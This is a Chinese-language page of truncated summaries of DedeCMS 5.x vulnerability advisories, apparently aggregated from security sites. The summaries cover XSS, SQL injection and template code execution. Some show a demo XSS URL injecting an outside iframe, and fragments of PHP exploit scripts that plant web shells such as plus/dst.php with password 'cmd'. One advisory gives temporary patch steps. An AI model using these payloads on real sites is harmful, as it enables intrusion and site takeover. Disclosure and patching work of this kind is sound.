摘要:
漏洞版本:dedecms织梦5.5漏洞描述:北洋贱队(http://bbs.seceye.org)首发demo1:http://www.dedecms.com/plus/search.php?keyword=%22%3E%3Ciframe%20src=http://www.gohack.org%3E&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&TotalResult=%3Ciframe%20src=http://www.gohac 阅读全文
摘要:
漏洞版本:dedecms织梦 v5.6漏洞描述:DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。高效率标签缓存机制:允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在模型不能满足用户所有需求的情况下,DedeCMS推出一些互动的模块对系统进行补充,尽量满足用户的需求。demo1:http://www.test.com/plus/search.php?keyword=zhuba&s 阅读全文
摘要:
漏洞版本:Dedecms V5.6 Final漏洞描述:Dedecms V5.6 Final版本中的各个文件存在一系列问题,经过精心构造的含有恶意代表的模板内容可以通过用户后台的上传附件的功能上传上去,然后通过SQL注入修改附加表的模板路径为我们上传的模板路径,模板解析类:include/inc_archives_view.php没有对模板路径及名称做任何限制,则可以成功执行恶意代码。1、member/article_edit.php文件(注入)://漏洞在member文件夹下普遍存在,$dede_addonfields是由用户提交的,可以被伪造,伪造成功即可带入sql语句,于是我们可以给附加 阅读全文
摘要:
漏洞版本:DedeCms V5.6 漏洞描述:DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。高效率标签缓存机制:允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在模型不能满足用户所有需求的情况下,DedeCMS推出一些互动的模块对系统进行补充,尽量满足用户的需求。plus/advancedsearch.php$sql 变量未初始化。导致鸡助漏洞if($mid == 0) //必须绕过. 阅读全文
摘要:
漏洞版本:DedeCmsV5.6 漏洞描述:DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。1 respond();22 ShowMsg($msg,"javascript:;",0,3000);23 exit(); 24 }25 ?>测试方法:@Sebug.netdis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!http://www.ssvdb.com/plus/carbuyaction.ph... 阅读全文
摘要:
漏洞版本:DedeCmsV5.6漏洞描述:DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。edit_face.phpelse if($dopost=='delold') //45行{ if(empty($oldface)) { ShowMsg("没有可删除的头像!", "-1"); exit(); } $userdir = $cfg_u... 阅读全文
摘要:
测试方法:@Sebug.netdis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!#!usr/bin/php -w12){echo "[*] Exploit Success \n";if($aid==1)echo "[*] Shell:".$url."/$path/data/cache/fuck.php\n" ;if($aid==2)echo "[*]Shell:".$url."/$path/fuck.php\n" ;if($aid==3)echo "[*]Sh 阅读全文
摘要:
影响版本:DEDECMS全版本漏洞描叙:DEDECMS后台登陆模板中的gotopage变量未效验传入数据,导致XSS漏洞。\dede\templets\login.htm65行左右" />由于DEDECMS的全局变量注册机制,该变量内容可以被COOKIE变量覆盖,COOKIE可以在客户端持久化存储,最终导致一个XSS ROOTKIT。漏洞危害:管理员在触发DEDECMS任意的XSS漏洞(如留言本XSS)后,可以通过该漏洞永久劫持覆盖gotopage变量,在DEDECMS的后台登陆页面永久嵌入任意的恶意代码。验证:1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT 阅读全文
摘要:
测试方法:@Sebug.netdis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!")};';$buffer = POST($host,80,$url,$data,30);echo "shell:http://$host$argv[2]plus/dst.php,pass:cmd.";}else {echo "Sorry,target may not exist this bug.";exit;}function POST($host,$port,$path,$data,$timeout, $cookie=' 阅读全文
摘要:
2012/4/29 凌晨知道创宇安全研究团队截获到最新DEDECMS SQL注入 0day,官网目前提供下载的最新版5.7也受影响,截止本告警发出时官方尚未给出补丁或解决方案,此漏洞利用简单且dedecms安装之后默认即开启漏洞模块。知道创宇给出三种临时解决方案:方案一、临时补丁,需要四步1. 确保您的magic_quotes_gpc = On详细开启方式:打开php安装目录中的php.ini(若您使用的是appserv等集成环境,php.ini可能在系统盘符:\windows\php.ini),搜索magic_quotes_gpc,将其设置为On。2./plus/carbuyaction.p 阅读全文